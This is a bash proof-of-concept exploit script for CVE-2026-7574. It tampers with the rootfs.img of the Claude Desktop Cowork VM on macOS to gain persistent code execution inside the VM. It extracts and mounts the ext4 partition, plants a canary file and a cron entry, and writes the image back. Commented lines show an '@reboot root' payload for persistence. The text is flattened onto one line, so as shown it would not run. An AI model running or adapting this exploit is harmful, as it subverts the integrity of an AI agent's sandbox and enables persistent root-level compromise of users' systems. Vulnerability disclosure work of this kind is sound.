#!/bin/bash # CVE-2026-7574 PoC # Author: Ashraf Zaryouh (@0xBlackash) # GitHub: https://github.com/0xBlackash # Target: Anthropic Claude Desktop Cowork VM (macOS) # Date: June 2026 # Description: Demonstrates rootfs.img tampering leading to persistent code execution inside the VM set -euo pipefail echo "=== CVE-2026-7574 PoC - 0xBlackash ===" IMG="$HOME/Library/Application Support/Claude/vm_bundles/claudevm.bundle/rootfs.img" BACKUP="${IMG}.bak.$(date +%s)" PARTITION="/tmp/rootfs.ext4" MNT="/tmp/cve-7574-mnt" if [ ! -f "$IMG" ]; then echo "❌ rootfs.img not found. Run Cowork mode in Claude Desktop first to download the bundle." exit 1 fi echo "✅ Target image: $IMG ($(du -sh "$IMG" | awk '{print $1}'))" # Backup (strongly recommended) read -p "Create backup before modification? (y/N) " -n 1 -r echo if [[ $REPLY =~ ^[Yy]$ ]]; then echo "[+] Creating backup..." cp "$IMG" "$BACKUP" echo " Backup: $BACKUP" fi # Extract ext4 partition (offsets based on public analysis - verify with gdisk/parted) echo "[+] Extracting ext4 partition..." dd if="$IMG" of="$PARTITION" bs=512 skip=206848 count=20764639 status=progress # Mount and inject payload echo "[+] Mounting filesystem..." sudo mkdir -p "$MNT" if sudo mount -o loop "$PARTITION" "$MNT" 2>/dev/null; then echo " Mounted successfully" # Harmless canary for demonstration echo "0xBlackash was here - CVE-2026-7574 PoC | $(date)" | sudo tee "$MNT/etc/0xblackash-poc.txt" >/dev/null echo " [+] Injected proof-of-concept canary" # Example: Persistent marker (harmless) echo "# 0xBlackash CVE-2026-7574" | sudo tee -a "$MNT/etc/cron.d/blackash-poc" >/dev/null # Optional: More advanced payload examples (commented) # sudo cp /path/to/payload.sh "$MNT/usr/local/bin/" # echo "@reboot root /usr/local/bin/payload.sh" | sudo tee "$MNT/etc/crontab" sudo umount "$MNT" echo " Unmounted" else echo "❌ Failed to mount. Use Linux environment with ext4 support (or install macFUSE + ext4 tools)." exit 1 fi # Reinsert modified partition echo "[+] Reinserting modified partition..." dd if="$PARTITION" of="$IMG" bs=512 seek=206848 conv=notrunc status=progress echo "✅ PoC completed successfully!" echo "" echo "Verification steps:" echo "1. Launch Claude Desktop and start Cowork VM" echo "2. Inside the VM, run: cat /etc/0xblackash-poc.txt" echo "3. Changes persist across VM restarts (no re-download triggered)" echo "" echo "The VM boots normally because only file presence + .rootfs.img.origin marker is checked — no content integrity verification." # Cleanup rm -f "$PARTITION" sudo rm -rf "$MNT"